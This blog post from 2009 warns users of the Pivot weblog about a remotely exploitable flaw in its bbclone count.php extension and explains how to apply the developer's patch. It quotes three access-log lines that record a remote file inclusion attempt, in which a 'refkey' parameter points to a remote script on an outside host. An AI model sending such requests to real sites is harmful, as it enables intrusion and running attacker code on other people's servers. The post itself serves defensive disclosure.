Remotely exploitable vulnerability found in Pivot v1.40.6!

Mar 19, 2009

Attention all users of the Pivot weblog package! A remotely exploitable vulnerability was discovered in the /web/content/extensions/bbclone_tools/count.php file. This vulnerability can be used by an attacker to delete files from your web content directory, and if the register_globals PHP variable is set, it can be used to stage a remote file inclusion attack. One person (I'll blank their IP address) has already tried it on my website:

a.b.c.d - - [19/Mar/2009:17:19:22 -0400] "GET //extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1.1" 200 61 "-" "Mozilla/5.0"
a.b.c.d - - [19/Mar/2009:17:19:22 -0400] "GET /pivot//extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
a.b.c.d - - [19/Mar/2009:17:19:23 -0400] "GET /pivot/archive.php?c=images&t=my_frontpage.html//extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1.1" 301 - "-" "Mozilla/5.0"


The advisory and proof of concept attack may be found at milw0rm.com.

Pivot developer Hansfn has already responded to the bug by releasing a patch. A new release is planned for sometime tonight (he's in Norway, so keep this in mind) but you can fix the bug yourself by replacing your /extensions/bbclone_tools/count.php file with this one from the official development code repository. All you have to do is rename the old count.php file, download the new one from the above link (which I copied from Hansfn's post in the forums), and you're good to go.